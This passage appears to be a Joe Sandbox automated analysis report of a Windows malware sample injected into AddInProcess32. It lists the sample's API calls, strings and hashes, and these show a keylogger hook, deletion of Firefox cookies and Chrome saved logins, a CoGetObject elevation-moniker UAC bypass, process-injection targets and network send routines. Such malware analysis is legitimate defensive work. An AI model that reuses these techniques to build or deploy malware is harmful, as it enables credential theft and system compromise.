                  • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                  • API String ID: 3527384056-432212279
                  • Opcode ID: 10bf6c217e0b25296ff8c4f6571a9877a80f89d81c2766d0b614c08461d6f91f
                  • Instruction ID: daa8673b40617291cefb90f55d029d970aaced9502edc59260dc825ad40fac9f
                  • Opcode Fuzzy Hash: 10bf6c217e0b25296ff8c4f6571a9877a80f89d81c2766d0b614c08461d6f91f
                  • Instruction Fuzzy Hash: 38417D3190021AAADB04F7A6DC5A9EEB769DF11704F50017FF506B20D2EF385A46CA9E
                  APIs
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,004750E4,?,00475338), ref: 0040F48E
                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F4B9
                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040F4D5
                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040F554
                  • CloseHandle.KERNEL32(00000000), ref: 0040F563
                    • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000000,00000000), ref: 0041C1F5
                    • Part of subcall function 0041C1DD: OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000000,00000000), ref: 0041C208
                  • CloseHandle.KERNEL32(00000000), ref: 0040F66E
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseHandleOpenProcessProcess32$CreateFileFirstModuleNameNextSnapshotToolhelp32
                  • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe
                  • API String ID: 3756808967-1743721670
                  • Opcode ID: b1e1f41d80490b315896909958d9242b500036c9ac5089c02299af30cc885f9c
                  • Instruction ID: b3f00c97eb68dcc530bbf6735eb7028ff3362e05d7342ed3a56d945b0ce45bff
                  • Opcode Fuzzy Hash: b1e1f41d80490b315896909958d9242b500036c9ac5089c02299af30cc885f9c
                  • Instruction Fuzzy Hash: F6715E705083419BC724FB21D8959AEB7A5AF90348F50083FF586631E3EF78994ECB5A
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: 0$1$2$3$4$5$6$7$VG
                  • API String ID: 0-1861860590
                  • Opcode ID: b5a7de883cd012ce8913fa8e37131401e824a11eb2676ecb59610ee39723a0e8
                  • Instruction ID: 08acf1e0be570df0aadc768861284cd9b307e7e5fc43d41925289fb9f64992c1
                  • Opcode Fuzzy Hash: b5a7de883cd012ce8913fa8e37131401e824a11eb2676ecb59610ee39723a0e8
                  • Instruction Fuzzy Hash: A771B2709183019FD304EF21D862BAB7B94DF95310F10492FF5A26B2D1DF78AA49CB96
                  APIs
                  • _wcslen.LIBCMT ref: 00407521
                  • CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Object_wcslen
                  • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                  • API String ID: 240030777-3166923314
                  • Opcode ID: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                  • Instruction ID: 36c1a35fc662e139fbe0c3856e6c09b73c1590006896ac343f6f9e6a2f87480d
                  • Opcode Fuzzy Hash: a3f0521951bb9342bb967e70cc438d07290dcccf7f3efa3b8b817ec6fb2293fa
                  • Instruction Fuzzy Hash: 1D115172D04218BAD710E6959C45ADEB7A89B08714F15007BF904B2282E77CAA4486BA
                  APIs
                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004758E8), ref: 0041A75E
                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 0041A7AD
                  • GetLastError.KERNEL32 ref: 0041A7BB
                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041A7F3
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: EnumServicesStatus$ErrorLastManagerOpen
                  • String ID:
                  • API String ID: 3587775597-0
                  • Opcode ID: 23e486b81d5319d6976a5705641320cfcad202a7a3e49a3714ee4dfbb4f6799a
                  • Instruction ID: 0905bbee584710e72bd43cf86ffd47af08151029a50ddcda7611e9b1cb6672f7
                  • Opcode Fuzzy Hash: 23e486b81d5319d6976a5705641320cfcad202a7a3e49a3714ee4dfbb4f6799a
                  • Instruction Fuzzy Hash: A1815F71104305ABC304EB61D885DAFB7A8FF94749F50092FF585521A2EF78EE48CB9A
                  APIs
                    • Part of subcall function 00448215: GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                    • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                    • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                    • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                    • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0045271C
                  • IsValidCodePage.KERNEL32(00000000), ref: 00452777
                  • IsValidLocale.KERNEL32(?,00000001), ref: 00452786
                  • GetLocaleInfoW.KERNEL32(?,00001001,lJD,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 004527CE
                  • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 004527ED
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                  • String ID: lJD$lJD$lJD
                  • API String ID: 745075371-479184356
                  • Opcode ID: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                  • Instruction ID: 5597d49bf91f8be5c1e88387600e3254545b136a20640e737b6730ed74bf2304
                  • Opcode Fuzzy Hash: be4990bb79c05073f0fe7f4ee341d14c88f356d0bde4897ead87a4f5288e3279
                  • Instruction Fuzzy Hash: 87518371900205ABDF10DFA5CD41ABF77B8AF19702F14047BFD04E7292E7B899488B69
                  APIs
                  • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040C39B
                  • FindNextFileW.KERNEL32(00000000,?), ref: 0040C46E
                  • FindClose.KERNEL32(00000000), ref: 0040C47D
                  • FindClose.KERNEL32(00000000), ref: 0040C4A8
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$CloseFile$FirstNext
                  • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                  • API String ID: 1164774033-405221262
                  • Opcode ID: 08abbb823d5645fbb38466ebfa51880db55170c7ba6cb46b2d507d1ef508ad21
                  • Instruction ID: 975c513e22faa42ee1994afe11ceef4a5d9ff9fa3a88a4f7cb3cdca8b35e8719
                  • Opcode Fuzzy Hash: 08abbb823d5645fbb38466ebfa51880db55170c7ba6cb46b2d507d1ef508ad21
                  • Instruction Fuzzy Hash: 4131513150021AA6CB14E7A1DC9ADFE7778AF10718F10017FB105B20D2EF789A49CA4D
                  APIs
                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,00474EE0,?), ref: 0041C2EC
                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,00474EE0,?), ref: 0041C31C
                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,00474EE0,?), ref: 0041C38E
                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C39B
                    • Part of subcall function 0041C291: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,00474EE0,?), ref: 0041C371
                  • GetLastError.KERNEL32(?,?,?,?,?,00474EE0,?), ref: 0041C3BC
                  • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D2
                  • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3D9
                  • FindClose.KERNEL32(00000000,?,?,?,?,?,00474EE0,?), ref: 0041C3E2
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                  • String ID:
                  • API String ID: 2341273852-0
                  • Opcode ID: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
                  • Instruction ID: c19bc5cae20e4253aafd1d57f534f4f4794eeb6ee7264df4fdb3445c687e6cd6
                  • Opcode Fuzzy Hash: 5daa9100e03deb39a4691b7b17906df9641a5acb862147602035c05749f1dd0e
                  • Instruction Fuzzy Hash: 1331827294031CAADB24E7A1DC88EDB736CAF04305F4405FBF955D2152EB39DAC88B68
                  APIs
                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00419D4B
                  • FindNextFileW.KERNEL32(00000000,?,?), ref: 00419E17
                    • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: File$Find$CreateFirstNext
                  • String ID: 8SG$PXG$PXG$NG$PG
                  • API String ID: 341183262-3812160132
                  • Opcode ID: c12a7a06cd91389c945adf6a1785f0550749601eff383afe73ed6c7c7bc712d6
                  • Instruction ID: 96038134cf9b6260143958ba34f432c8b7c7433700823f8ab46a3e18139dd1a2
                  • Opcode Fuzzy Hash: c12a7a06cd91389c945adf6a1785f0550749601eff383afe73ed6c7c7bc712d6
                  • Instruction Fuzzy Hash: D48152315083415AC314FB22C856EEFB3A9AF90344F90493FF546671E2EF789A49C69A
                  APIs
                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040A2D3
                  • SetWindowsHookExA.USER32(0000000D,0040A2A4,00000000), ref: 0040A2E1
                  • GetLastError.KERNEL32 ref: 0040A2ED
                    • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
                  • GetMessageA.USER32 ref: 0040A33B
                  • TranslateMessage.USER32(?), ref: 0040A34A
                  • DispatchMessageA.USER32 ref: 0040A355
                  Strings
                  • Keylogger initialization failure: error , xrefs: 0040A301
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                  • String ID: Keylogger initialization failure: error
                  • API String ID: 3219506041-952744263
                  • Opcode ID: 4f13040d40fce51975cfbbc3673976c4dad95410904dfe41d9466c849e225161
                  • Instruction ID: 26c2bdf112627336efb266b6f5317542b4ef4d62b82d8858756ad59ca9dca42a
                  • Opcode Fuzzy Hash: 4f13040d40fce51975cfbbc3673976c4dad95410904dfe41d9466c849e225161
                  • Instruction Fuzzy Hash: FA11BF32604301ABCB107F76DC0A86B77ECEA95716B10457EFC85E21D1EA38C910CBAA
                  APIs
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                  • String ID:
                  • API String ID: 1888522110-0
                  • Opcode ID: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
                  • Instruction ID: 5ff565fa5b8df07833abad56ec5ecbabe923af01fc99f1944a330f9e709d98a3
                  • Opcode Fuzzy Hash: 4ba0a60493bf1cb7a04a280161e9af6e0206db9f66fbe83c406a8642f04fa518
                  • Instruction Fuzzy Hash: AE316D72504308FFD710DF94DC45F9BB7ECAB88705F01083AB645D61A0E7B5E9488BA6
                  APIs
                  • RegCreateKeyExW.ADVAPI32(00000000), ref: 0041409D
                  • RegCloseKey.ADVAPI32(?), ref: 004140A9
                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                  • LoadLibraryA.KERNEL32(Shlwapi.dll), ref: 0041426A
                  • GetProcAddress.KERNEL32(00000000), ref: 00414271
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: AddressCloseCreateLibraryLoadProcsend
                  • String ID: SHDeleteKeyW$Shlwapi.dll
                  • API String ID: 2127411465-314212984
                  • Opcode ID: b7359517016e2e52a7d8e2c138735bb23b4c70a2fa5bf599e9a0dfbaddd196e6
                  • Instruction ID: ad322413622673165c78a8c4b5f48079e939d646f467ca97d3bec1feacf55119
                  • Opcode Fuzzy Hash: b7359517016e2e52a7d8e2c138735bb23b4c70a2fa5bf599e9a0dfbaddd196e6
                  • Instruction Fuzzy Hash: F9B1F971A0430066CA14FB76DC5B9AF36A86FD1748F40053FF942771E2EE7C9A4886DA
                  APIs
                  • _free.LIBCMT ref: 00449212
                  • _free.LIBCMT ref: 00449236
                  • _free.LIBCMT ref: 004493BD
                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045F234), ref: 004493CF
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00472764,000000FF,00000000,0000003F,00000000,?,?), ref: 00449447
                  • WideCharToMultiByte.KERNEL32(00000000,00000000,004727B8,000000FF,?,0000003F,00000000,?), ref: 00449474
                  • _free.LIBCMT ref: 00449589
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: _free$ByteCharMultiWide$InformationTimeZone
                  • String ID:
                  • API String ID: 314583886-0
                  • Opcode ID: e51e2b160430e069a94018d2a40d83d225257a5f61c10d126208887eb2308fed
                  • Instruction ID: 779aab753f07af14b01adf3fce5c8211df4e7f9331a35af1166ddbde82723190
                  • Opcode Fuzzy Hash: e51e2b160430e069a94018d2a40d83d225257a5f61c10d126208887eb2308fed
                  • Instruction Fuzzy Hash: CAC15771900205ABFB24DF69CC41AAFBBA8EF46314F1405AFE89497381E7788E42D758
                  APIs
                    • Part of subcall function 00417952: GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                    • Part of subcall function 00417952: OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                    • Part of subcall function 00417952: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                    • Part of subcall function 00417952: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                    • Part of subcall function 00417952: GetLastError.KERNEL32 ref: 0041799D
                  • ExitWindowsEx.USER32(00000000,00000001), ref: 00416856
                  • LoadLibraryA.KERNEL32(PowrProf.dll), ref: 0041686B
                  • GetProcAddress.KERNEL32(00000000), ref: 00416872
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                  • String ID: !D@$PowrProf.dll$SetSuspendState
                  • API String ID: 1589313981-2876530381
                  • Opcode ID: 518a98aa8e33dee1c4de961979bab0d7f2b6bdf321556802f5344010ded5f568
                  • Instruction ID: 15d3ae9bc4d358b9de40311b9e813ebd0b85961e95f80c383f5c7d57e5fc9640
                  • Opcode Fuzzy Hash: 518a98aa8e33dee1c4de961979bab0d7f2b6bdf321556802f5344010ded5f568
                  • Instruction Fuzzy Hash: 6E21617060430256CB14FBB68856AAE63599F41788F41487FB442A72D3EF3CD845CBAE
                  APIs
                  • GetLocaleInfoW.KERNEL32(00000000,2000000B,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524D5
                  • GetLocaleInfoW.KERNEL32(00000000,20001004,00000000,00000002,00000000,?,?,?,0045275B,?,00000000), ref: 004524FE
                  • GetACP.KERNEL32(?,?,0045275B,?,00000000), ref: 00452513
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: InfoLocale
                  • String ID: ACP$OCP$['E
                  • API String ID: 2299586839-2532616801
                  • Opcode ID: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                  • Instruction ID: 65f7b5195a5790e2d5819d7d4b0c6b76a8aa59636dcad79128a037cfc813d78c
                  • Opcode Fuzzy Hash: 996ac876140471f7f335f389899e539d753f319036e5aa489baf53db5bb263cf
                  • Instruction Fuzzy Hash: FD21F432600104A7DB348F54CF00AA773A6EB47B1AB168567EC09D7302F7BADD48C398
                  APIs
                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040BA4E
                  • GetLastError.KERNEL32 ref: 0040BA58
                  Strings
                  • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040BA19
                  • [Chrome StoredLogins not found], xrefs: 0040BA72
                  • [Chrome StoredLogins found, cleared!], xrefs: 0040BA7E
                  • UserProfile, xrefs: 0040BA1E
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: DeleteErrorFileLast
                  • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  • API String ID: 2018770650-1062637481
                  • Opcode ID: 0e718a6ebf02f44b4289ad564225df6632aa7359f7d3b59aeb067c3ad082f2b5
                  • Instruction ID: af402a2c9819bc64f7c9913ab42ffc044d60d1b3c88a69bbc3d4df1d4d30a246
                  • Opcode Fuzzy Hash: 0e718a6ebf02f44b4289ad564225df6632aa7359f7d3b59aeb067c3ad082f2b5
                  • Instruction Fuzzy Hash: 2D01A7B17801056AC70477B6CD5B9BE77249911704F50057FF802725E2FE7D59098ADE
                  APIs
                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 0041795F
                  • OpenProcessToken.ADVAPI32(00000000), ref: 00417966
                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00417978
                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00417997
                  • GetLastError.KERNEL32 ref: 0041799D
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                  • String ID: SeShutdownPrivilege
                  • API String ID: 3534403312-3733053543
                  • Opcode ID: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                  • Instruction ID: b599e5caaba2c857c5a7044ea86e3d1b9a306509f9612008a7a3a71442eb1233
                  • Opcode Fuzzy Hash: 57e92913f0a9f4d9b3a8183d8d88438ae359a92b07d5b7f7122e8f665953110d
                  • Instruction Fuzzy Hash: 1EF03AB1801229FBDB109BA0EC4DEEF7FBCEF05612F100461B809A1092D7388E04CAB5
                  APIs
                  • __EH_prolog.LIBCMT ref: 00409258
                    • Part of subcall function 004048C8: connect.WS2_32(?,?,?), ref: 004048E0
                    • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004092F4
                  • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00409352
                  • FindNextFileW.KERNEL32(00000000,?), ref: 004093AA
                  • FindClose.KERNEL32(00000000), ref: 004093C1
                    • Part of subcall function 00404E26: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00474EF8,PkGNG,00000000,00474EF8,00404CA8,00000000,?,?,?,00474EF8,?), ref: 00404E38
                    • Part of subcall function 00404E26: SetEvent.KERNEL32(?), ref: 00404E43
                    • Part of subcall function 00404E26: CloseHandle.KERNELBASE(?), ref: 00404E4C
                  • FindClose.KERNEL32(00000000), ref: 004095B9
                    • Part of subcall function 00404AA1: WaitForSingleObject.KERNEL32(?,00000000,00401A45,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000), ref: 00404B47
                    • Part of subcall function 00404AA1: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00476B50,00474EE0,00000000,?,?,?,?,?,00401A45), ref: 00404B75
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$Close$EventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsend
                  • String ID:
                  • API String ID: 1824512719-0
                  • Opcode ID: 27b22fca0a27779137ade02a72c9abe49e1240f26c7200fc68e50cf31d4d9716
                  • Instruction ID: 125c9cc0036adb3739497efb01147483584b5989e706bb19fe9a4109aadf0594
                  • Opcode Fuzzy Hash: 27b22fca0a27779137ade02a72c9abe49e1240f26c7200fc68e50cf31d4d9716
                  • Instruction Fuzzy Hash: DCB18D32900109AACB14EBA1DD96AED7779AF04318F10417FF506B60E2EF785E49CB98
                  APIs
                  • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,0041A6A0,00000000), ref: 0041AA53
                  • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,0041A6A0,00000000), ref: 0041AA68
                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA75
                  • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,0041A6A0,00000000), ref: 0041AA80
                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA92
                  • CloseServiceHandle.ADVAPI32(00000000,?,0041A6A0,00000000), ref: 0041AA95
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Service$CloseHandle$Open$ManagerStart
                  • String ID:
                  • API String ID: 276877138-0
                  • Opcode ID: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                  • Instruction ID: 9fefcdd13c5f6832e1e8d6374d810b05479d45f16fba084c356bea358aebaaee
                  • Opcode Fuzzy Hash: 9428b136f56b7ac5d2013585799c428180de648bb4d6702bc273cde58ba3a705
                  • Instruction Fuzzy Hash: FCF08971101325AFD2119B619C88DFF2B6CDF85BA6B00082AF945921919B68CD49E9B9
                  APIs
                    • Part of subcall function 00413549: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000), ref: 00413569
                    • Part of subcall function 00413549: RegQueryValueExA.ADVAPI32 ref: 00413587
                    • Part of subcall function 00413549: RegCloseKey.ADVAPI32(00000000), ref: 00413592
                  • Sleep.KERNEL32(00000BB8), ref: 0040F85B
                  • ExitProcess.KERNEL32 ref: 0040F8CA
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: CloseExitOpenProcessQuerySleepValue
                  • String ID: 5.1.0 Pro$override$pth_unenc
                  • API String ID: 2281282204-182549033
                  • Opcode ID: 239e53c764d611775cc28217bb96d4133c4679258c828bc8db514802d76be294
                  • Instruction ID: 07d0e0dc4205ecb16ec703249a4fc897915f305b32a2beb09604d1d6565ffe0f
                  • Opcode Fuzzy Hash: 239e53c764d611775cc28217bb96d4133c4679258c828bc8db514802d76be294
                  • Instruction Fuzzy Hash: F821F371B0420167C604767A485B6AE35A95B80718F90403FF505676D7FF7C8E0583EF
                  APIs
                  • FindResourceA.KERNEL32 ref: 0041B4B9
                  • LoadResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4CD
                  • LockResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4D4
                  • SizeofResource.KERNEL32(00000000,?,?,0040F3DE,00000000), ref: 0041B4E3
                  Strings
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Resource$FindLoadLockSizeof
                  • String ID: SETTINGS
                  • API String ID: 3473537107-594951305
                  • Opcode ID: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                  • Instruction ID: 65170a014006dd87783428e4339c5f85687a52ee3761dac8d56b05c0676c202a
                  • Opcode Fuzzy Hash: 572f255012f9d3464d264dba9da87f940f43aba7d13ccaaee0753afa8a381888
                  • Instruction Fuzzy Hash: 8AE01A36200B22EBEB311BA5AC4CD473E29F7C97637100075F90596232CB798840DAA8
                  APIs
                  • __EH_prolog.LIBCMT ref: 0040966A
                  • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 004096E2
                  • FindNextFileW.KERNEL32(00000000,?), ref: 0040970B
                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00409722
                  Memory Dump Source
                  • Source File: 00000019.00000002.484229663.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_25_2_400000_AddInProcess32.jbxd
                  Yara matches
                  Similarity
                  • API ID: Find$File$CloseFirstH_prologNext
                  • String ID:
                  • API String ID: 1157919129-0
                  • Opcode ID: f1abb1e18261a1922addd69d7cffa3ae5e96847022b02d1b31507e848c25f0fe
                  • Instruction ID: bc6583c976318a9931a9d4e75bf6093b5b8d8c817350453c5398c0af4fd679c1
                  • Opcode Fuzzy Hash: f1abb1e18261a1922addd69d7cffa3ae5e96847022b02d1b31507e848c25f0fe
                  • Instruction Fuzzy Hash: 59812B329001199BCB15EBA1DC969EDB378AF14318F10417FE506B71E2EF78AE49CB58
                  APIs
                  • __EH_prolog.LIBCMT ref: 00408811
                  • FindFirstFileW.KERNEL32(00000000,?,00466608,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004088CA
